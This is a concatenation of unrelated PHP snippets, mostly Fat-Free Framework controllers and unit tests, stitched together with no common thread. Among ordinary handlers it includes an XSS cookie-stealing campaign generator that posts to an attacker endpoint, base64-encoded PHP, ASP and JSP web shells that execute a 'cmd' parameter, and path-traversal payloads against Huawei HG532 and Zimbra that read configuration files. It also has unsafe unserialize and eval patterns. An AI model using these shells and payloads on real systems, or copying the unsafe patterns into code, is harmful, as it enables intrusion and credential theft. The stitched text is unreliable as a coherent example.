/** * auth service callback * @param Base $f3 * @param $params */ function callback(\Base $f3, $params) { $Opauth = new \Opauth($this->config, false); switch ($Opauth->env['callback_transport']) { case 'session': $response = $f3->get('SESSION.opauth'); $f3->clear('SESSION.opauth'); break; case 'post': $response = unserialize(base64_decode($f3->get('POST.opauth'))); break; case 'get': $response = unserialize(base64_decode($f3->get('GET.opauth'))); break; default: $f3->error(400, 'Unsupported callback_transport'); break; } if (isset($response['error'])) { $f3->call($this->abortFunc, array($response)); return; } $data = $response['auth']; // validate if (empty($data) || empty($response['timestamp']) || empty($response['signature']) || empty($data['provider']) || empty($data['uid'])) { $f3->error(400, 'Invalid auth response: Missing key auth response components'); } elseif (!$Opauth->validate(sha1(print_r($data, true)), $response['timestamp'], $response['signature'], $reason)) { $f3->error(400, 'Invalid auth response: ' . $reason); } else { // It's all good $f3->call($this->successFunc, array($data)); } }
/** * @dataProvider providerForCustomBase */ public function testCustomBase($base, $custom, $input) { $object = new Base($base, $custom); $this->assertTrue($object->__invoke($input)); $this->assertTrue($object->check($input)); $this->assertTrue($object->assert($input)); }
public function testGetFiles() { $directory = $this->getMock('Magento\\Framework\\Filesystem\\Directory\\Read', [], [], '', false); $filesystem = $this->getMock('Magento\\Framework\\App\\Filesystem', ['getDirectoryRead'], [], '', false); $filesystem->expects($this->once())->method('getDirectoryRead')->with(\Magento\Framework\App\Filesystem::MODULES_DIR)->will($this->returnValue($directory)); $globalFiles = ['Namespace/One/view/base/layout/one.xml', 'Namespace/Two/view/base/layout/two.xml']; $areaFiles = ['Namespace/Two/view/frontend/layout/four.txt', 'Namespace/Two/view/frontend/layout/three.xml']; $directory->expects($this->at(0))->method('search')->with('*/*/view/base/layout/*.xml')->will($this->returnValue($globalFiles)); $directory->expects($this->at(3))->method('search')->with('*/*/view/frontend/layout/*.xml')->will($this->returnValue($areaFiles)); $directory->expects($this->atLeastOnce())->method('getAbsolutePath')->will($this->returnArgument(0)); $objectManager = $this->getMockForAbstractClass('Magento\\Framework\\ObjectManager'); $objectManager->expects($this->atLeastOnce())->method('create')->with('Magento\\Framework\\View\\File', $this->anything())->will($this->returnCallback(array($this, 'createFileCallback'))); $fileFactory = new \Magento\Framework\View\File\Factory($objectManager); $theme = $this->getMockForAbstractClass('Magento\\Framework\\View\\Design\\ThemeInterface'); $theme->expects($this->once())->method('getArea')->will($this->returnValue('frontend')); $model = new Base($filesystem, $fileFactory, 'layout'); $result = $model->getFiles($theme, '*.xml'); for ($i = 0; $i <= 2; $i++) { $this->assertArrayHasKey($i, $result); $this->assertInstanceOf('\\Magento\\Framework\\View\\File', $result[$i]); } $this->assertEquals($globalFiles[0], $result[0]->getFilename()); $this->assertEquals($globalFiles[1], $result[1]->getFilename()); $this->assertEquals($areaFiles[1], $result[2]->getFilename()); }
/** * @param \Base $f3 * Description This function will be used to create the necessary script needed to hook a page. */ function create_campaign(\Base $f3) { $web = \Web::instance(); $this->response->data['SUBPART'] = 'xssrc_campaign.html'; if ($f3->get('VERB') == 'POST') { $error = false; if ($f3->devoid('POST.targetUrl')) { $error = true; \Flash::instance()->addMessage('Please enter a Target url to test access once you steal cookies e.g. http://victim.mth3l3m3nt.com/admin', 'warning'); } else { $target_url = $f3->get('POST.targetUrl'); $c_host = parse_url($target_url, PHP_URL_HOST); $template_src = $f3->ROOT . $f3->BASE . '/scripts/attack_temp.mth3l3m3nt'; $campaign_file = $f3->ROOT . $f3->BASE . '/scripts/' . $c_host . '.js'; $campaign_address = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/scripts/' . $c_host . '.js'; $postHome = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/xssr'; copy($template_src, $campaign_file); $unprepped_contents = file_get_contents($campaign_file); $unprepped_contents = str_replace("http://attacker.mth3l3m3nt.com/xssr", $postHome, $unprepped_contents); $unprepped_contents = str_replace("http://victim.mth3l3m3nt.com/admin/", $target_url, $unprepped_contents); file_put_contents($campaign_file, $unprepped_contents); $instructions = \Flash::instance()->addMessage('Attach the script to target e.g. <script src="' . $campaign_address . '"></script>', 'success'); $this->response->data['content'] = $instructions; } } }
/** * clear expired cached files * >> >php index.php "/cron/deleteExpiredCacheData" * @param \Base $f3 */ function deleteExpiredData(\Base $f3) { $time_start = microtime(true); // cache dir (dir is recursively searched...) $cacheDir = $f3->get('TEMP'); $filterTime = (int) strtotime('-' . $f3->get('PATHFINDER.CACHE.EXPIRE_MAX') . ' seconds'); $expiredFiles = Search::getFilesByMTime($cacheDir, $filterTime); $deletedFiles = 0; $deletedSize = 0; $notWritableFiles = 0; $deleteErrors = 0; foreach ($expiredFiles as $filename => $file) { /** * @var $file \SplFileInfo */ if ($file->isWritable()) { $tmpSize = $file->getSize(); if (unlink($file->getRealPath())) { $deletedSize += $tmpSize; $deletedFiles++; } else { $deleteErrors++; } } else { $notWritableFiles++; } } $execTime = microtime(true) - $time_start; // Log ------------------------ $log = new \Log('cron_' . __FUNCTION__ . '.log'); $log->write(sprintf(self::LOG_TEXT, __FUNCTION__, $deletedFiles, $deletedSize, $notWritableFiles, $deleteErrors, $execTime)); }
public function shellGenerator(\Base $f3) { $this->response->data['SUBPART'] = 'websaccre_shellgen.html'; $pshell = "PD9waHAgDQppZiAoaXNzZXQoJF9SRVFVRVNUWydjbWQnXSkpeyANCiAgICAkY21kPSgkX1JFUVVFU1RbImNtZCJdKTsgDQogICAgZWNobyBzeXN0ZW0oJGNtZCk7IA0KICAgIGRpZTsgDQp9IA0KPz4="; $ashell = "PCUNCklmIChyZXF1ZXN0KCJjbWQiKSA8PiAiIikgVGhlbg0KUmVzcG9uc2UuV3JpdGUgU2VydmVyLkhUTUxFbmNvZGUoc2VydmVyLmNyZWF0ZW9iamVjdCgid3NjcmlwdC5zaGVsbCIpLmV4ZWMoU2VydmVyLk1hcFBhdGgoImNtZC5leGUiKSYgIiAvYyAiICYNCg0KcmVxdWVzdCgiY21kIikpLnN0ZG91dC5yZWFkYWxsKQ0KRW5kIElmDQolPg"; $jshell = "PCUgaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSAhPSBudWxsKSB7IG91dC5wcmludGxuKCJDb21tYW5kOiAiICsgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpICsgIjxiciAvPiIpOyBQcm9jZXNzIHAgPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7IE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7IElucHV0U3RyZWFtIGluID0gcC5nZXRJbnB1dFN0cmVhbSgpOyBEYXRhSW5wdXRTdHJlYW0gZGlzID0gbmV3IERhdGFJbnB1dFN0cmVhbShpbik7IFN0cmluZyBkaXNyID0gZGlzLnJlYWRMaW5lKCk7IHdoaWxlICggZGlzciAhPSBudWxsICkgeyBvdXQucHJpbnRsbihkaXNyKTsgZGlzciA9IGRpcy5yZWFkTGluZSgpOyB9IH0gJT4g"; $jspx = "PGpzcDpyb290IHhtbG5zOmpzcD0iaHR0cDovL2phdmEuc3VuLmNvbS9KU1AvUGFnZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHhtbG5zOmM9Imh0dHA6Ly9qYXZhLnN1bi5jb20vanNwL2pzdGwvY29yZSIgdmVyc2lvbj0iMi4wIj4NCjxqc3A6ZGlyZWN0aXZlLnBhZ2UgY29udGVudFR5cGU9InRleHQvaHRtbDtjaGFyc2V0PVVURi04IiBwYWdlRW5jb2Rpbmc9IlVURi04Ii8"; $shell_type = $f3->get('POST.shelltype'); if ($f3->get('VERB') == 'POST') { $error = false; switch ($shell_type) { case "PHP": $this->response->data['content'] = base64_decode($pshell); break; case "ASP": $this->response->data['content'] = base64_decode($ashell); break; case "JSP": $this->response->data['content'] = base64_decode($jshell); break; case "JSPX": $this->response->data['content'] = base64_decode($jspx); break; default: $this->response->data['content'] = "Invalid Shell Type Request"; break; } } }
function command_parse() { global $DB, $Core, $Parse, $Security, $Base, $Style; if (!$Security->allowed()) { return; } $include = implode("/", module()); if (file_exists("module/{$include}/main.php")) { $dir = ""; foreach (module() as $module) { $dir .= "{$module}/"; $shared = "module/{$dir}shared.php"; if (file_exists($shared)) { include $shared; } } require_once "module/{$include}/main.php"; if (function_exists(command())) { eval(command() . "();"); } if (file_exists("module/{$include}/.content/" . func() . ".php")) { if (!get('ajax') && !get('xml')) { require_once "module/{$include}/.content/" . func() . ".php"; } } } else { $Base = new Base(); $Base->title("Invalid Module"); $Base->Header(); $Base->Footer(); } }
public function action_postAnswers($set) { $model = new Base(); $setVars = $model->setVars($set); print_r(Input::get('answers')); $model->storeAnswers(Input::get('answers')); }
public static function year(\Base $fat) { $year = (int) $fat->get('PARAMS.year'); if (!in_array($year, $fat->get('YEARS'))) { $year = $fat->get('YEAR'); } echo self::contest($year); }
/** * Check if valid key was sent * * @returns bool */ public static function validKey() { if (!isset($_GET['apikey'])) { return false; } $base = new Base(); return $base->getDao()->getUserExistsByApiKey($_GET['apikey']); }
public function testSetAndGetAlias() { $instance = new Base(''); $instance->setAlias('foo'); $this->assertEquals('foo', $instance->getAlias()); $instance->setAlias('bar'); $this->assertEquals('bar', $instance->getAlias()); }
/** * @test */ public function testAssertNotZeroExitSuppressed() { // Command should yield an error $command = "exit 1"; $this->_obj->expects($this->any())->method('getCommand')->will($this->returnValue($command)); $this->_obj->setSuppressErrors(true); $this->_obj->run(); $this->markTestIncomplete("Don't know how to check for the absence of a certain output regex"); }
protected function _getConfig() { if (!$this->_config) { $hive = $this->_fw->hive(); $hive['xhbid'] = $this->getXhbId(); $this->_processConfig($hive); } return $this->_config; }
/** * delete all expired signatures on "inactive" systems * >> php index.php "/cron/deleteSignatures" * @param \Base $f3 */ function deleteSignatures(\Base $f3) { $signatureExpire = (int) $f3->get('PATHFINDER.CACHE.EXPIRE_SIGNATURES'); if ($signatureExpire > 0) { $pfDB = DB\Database::instance()->getDB('PF'); $sqlDeleteExpiredSignatures = "DELETE `sys` FROM\n `system_signature` `sys` INNER JOIN\n `system` ON \n `system`.`id` = `sys`.`systemId`\n WHERE\n `system`.`active` = 0 AND\n TIMESTAMPDIFF(SECOND, `sys`.`updated`, NOW() ) > :lifetime\n "; $pfDB->exec($sqlDeleteExpiredSignatures, ['lifetime' => $signatureExpire]); } }
/** * POST /post.json * Create a new post * * @todo Allow posting to a buddy's page * @param \Base $fw */ public function post(\Base $fw) { $userId = self::_requireAuth(); if ($fw->get('POST.user_id') != $userId) { \App::error(403); } $post = \Model\Post::create(['user_id' => $userId, 'page_id' => $fw->get('POST.user_id'), 'content' => $fw->get('POST.content')]); $detail = \App::model('post/detail')->load($post->id); $this->_json($detail->cast()); }
/** * Huawei_lfi * cve-2015-7254 * Directory traversal vulnerability on Huawei HG532e, HG532n, and HG532s devices allows remote attackers to read arbitrary files via a .. (dot dot) in an icon/ URI. * @param \Base $f3 * Alternative file read: http://<target_IP>:37215/icon/../../../etc/inittab. */ public function huawei_lfi(\Base $f3) { $lfi = new Larfi(); $f3->set('exploit_title', 'HUAWEI LFI (cve-2015-7254) Huawei HG532e, HG532n, & HG532s'); $this->response->data['SUBPART'] = 'lfi_page.html'; $blankurl = $f3->devoid('POST.url'); $url = $f3->get('POST.url'); $payload = ":37215/icon/../../../etc/defaultcfg.xml"; return $this->uri_based_lfi($blankurl, $url, $payload); }
function RegPage_CreateCode($n) { global $zbp; for ($i = 0; $i < 100; $i++) { $r = new Base($GLOBALS['RegPage_Table'], $GLOBALS['RegPage_DataInfo']); $r->InviteCode = GetGuid(); $r->Level = $zbp->Config('RegPage')->default_level; $r->Save(); } }
/** * Zimbra Collaboration Server URI Based LFI * @param \Base $f3 */ public function zimbra_lfi(\Base $f3) { $lfi = new Larfi(); $f3->set('exploit_title', 'Zimbra Collaboration server LFI (Versions: <=7.2.2 and <=8.0.2 )'); $this->response->data['SUBPART'] = 'lfi_page.html'; $blankurl = $f3->devoid('POST.url'); $url = $f3->get('POST.url'); $payload = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"; return $this->uri_based_lfi($blankurl, $url, $payload); }
public function run($event = 'before') { if (!isset($this->routes[$event])) { return true; } foreach ($keys = array_keys($this->routes[$event]) as $key) { $paths[] = str_replace('@', '*@', $key); } $vals = array_values($this->routes[$event]); array_multisort($paths, SORT_DESC, $keys, $vals); $this->routes[$event] = array_combine($keys, $vals); // Convert to BASE-relative URL $req = $this->f3->rel(urldecode($this->f3->URI)); foreach ($this->routes[$event] as $pattern => $routes) { if (!($args = $this->f3->mask($pattern, $req))) { continue; } ksort($args); $route = NULL; if (isset($routes[$ptr = $this->f3->AJAX + 1][$this->f3->VERB])) { $route = $routes[$ptr]; } elseif (isset($routes[\Base::REQ_SYNC | \Base::REQ_AJAX])) { $route = $routes[\Base::REQ_SYNC | \Base::REQ_AJAX]; } if (!$route) { continue; } if ($this->f3->VERB != 'OPTIONS' && isset($route[$this->f3->VERB])) { $parts = parse_url($req); if ($this->f3->VERB == 'GET' && preg_match('/.+\\/$/', $parts['path'])) { $this->f3->reroute(substr($parts['path'], 0, -1) . (isset($parts['query']) ? '?' . $parts['query'] : '')); } $handler = $route[$this->f3->VERB][0]; if (is_bool(strpos($pattern, '/*'))) { foreach (array_keys($args) as $key) { if (is_numeric($key) && $key) { unset($args[$key]); } } } if (is_string($handler)) { // Replace route pattern tokens in handler if any $handler = preg_replace_callback('/@(\\w+\\b)/', function ($id) use($args) { return isset($args[$id[1]]) ? $args[$id[1]] : $id[0]; }, $handler); if (preg_match('/(.+)\\h*(?:->|::)/', $handler, $match) && !class_exists($match[1])) { $this->f3->error(500, 'PreRoute handler not found'); } } // Call route handler return $this->f3->call($handler, array($this->f3, $args), 'beforeroute,afterroute') !== FALSE; } } return true; }
/** * @param Base $entity * @param string $type * @param array $parameters * @param bool $withNamespace */ public function __construct(Base $entity, $type, array $parameters = array(), $withNamespace = false) { if ($withNamespace) { $eventName = $entity->getNamespace() . $entity->getName() . '::' . $type; $this->entityEventType = $type; } else { $eventName = $entity->getName() . $type; } parent::__construct($entity->getModule(), $eventName, $parameters); $this->entity = $entity; }
/** * @param \Base $f3 */ private function onePager($f3) { $contents = ''; $tree = $this->ptService->getTree(); foreach ($tree as $rootPage) { $layoutClassName = $this->getLayoutClassForPage($rootPage); $layout = new $layoutClassName(array($rootPage), $this->lang, $this->tree); $contents .= $layout->doRender(); } $f3->set('contents', $contents); }
/** * POST /register * @param \Base $fw */ function registerPost(\Base $fw) { try { $token = \Helper\Api\User::register($fw->get('POST')); $fw->set('COOKIE.session_token', $token); $fw->reroute('/stream'); } catch (\Exception $e) { $fw->set('error', $e->getMessage()); \App::error(403); } }
/** * @return null */ public function testBuild() { $expected = '<base href="' . $this->href . '" target="' . $this->target . '">'; $this->assertEquals($expected, $this->base->build()); $base = new BaseTag($this->href); $expected = '<base href="' . $this->href . '">'; $this->assertEquals($expected, $base->build()); $base = new BaseTag(null, $this->target); $expected = '<base target="' . $this->target . '">'; $this->assertEquals($expected, $base->build()); }
public function viewSingle(\Base $f3, $params) { $this->response->data['SUBPART'] = 'payload_view.html'; if (isset($params['id'])) { $this->resource->load(array('_id = ?', $params['id'])); if ($this->resource->dry()) { $f3->error(404, 'Payload not found'); } $this->response->data['POST'] = $this->resource; } }
/** * @param \Base $f3 * @param array $params * @return bool */ public function getSingle(\Base $f3, $params) { $this->response->data['SUBPART'] = 'comment_edit.html'; if (isset($params['id'])) { $this->response->data['comment'] = $this->resource->load(array('_id = ?', $params['id'])); if (!$this->resource->dry()) { return true; } } \Flash::instance()->addMessage('Unknown Comment ID', 'danger'); $f3->reroute($f3->get('SESSION.LastPageURL')); }
/** * @param \Base $f3 */ public function init($f3) { $character = $this->getCharacter(); // page title $pageTitle = $character ? $character->name : 'Map'; $f3->set('pageTitle', $pageTitle); // main page content $f3->set('pageContent', false); // body element class $f3->set('bodyClass', 'pf-body'); // JS main file $f3->set('jsView', 'mappage'); }
public function delete(\Base $f3, $params) { $this->resource->reset(); $msg = \Flash::instance(); if (isset($params['id'])) { $this->resource->load(array('_id = ?', $params['id'])); if ($f3->get('HOST') == 'ikkez.de' && !$this->resource->dry() && $this->resource->username == 'admin') { $msg->addMessage("You are not allowed to delete the demo-admin", 'danger'); $f3->reroute('/admin/' . $params['module']); return; } parent::delete($f3, $params); } $f3->reroute($f3->get('SESSION.LastPageURL')); }
public function get($request) { if (!$request instanceof Request) { $key = $request; $request = new Request(); $request->setKey($key); } $success = $this->processing($request); if (!$success) { if ($this->_successor) { $this->_successor->get($request); } } return $request->getResult(); }
/** * delete connection * @param \Base $f3 * @throws \Exception */ public function delete(\Base $f3) { $connectionIds = $f3->get('POST.connectionIds'); $activeCharacter = $this->getCharacter(); /** * @var Model\ConnectionModel $connection */ $connection = Model\BasicModel::getNew('ConnectionModel'); foreach ($connectionIds as $connectionId) { $connection->getById($connectionId); $connection->delete($activeCharacter); $connection->reset(); } echo json_encode([]); }
function __construct() { $f3 = Base::instance(); $dbh = new PDO($f3->get('db_dns') . $f3->get('db_name'), $f3->get('db_user'), $f3->get('db_pass')); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $this->f3 = $f3; $this->db = $dbh; }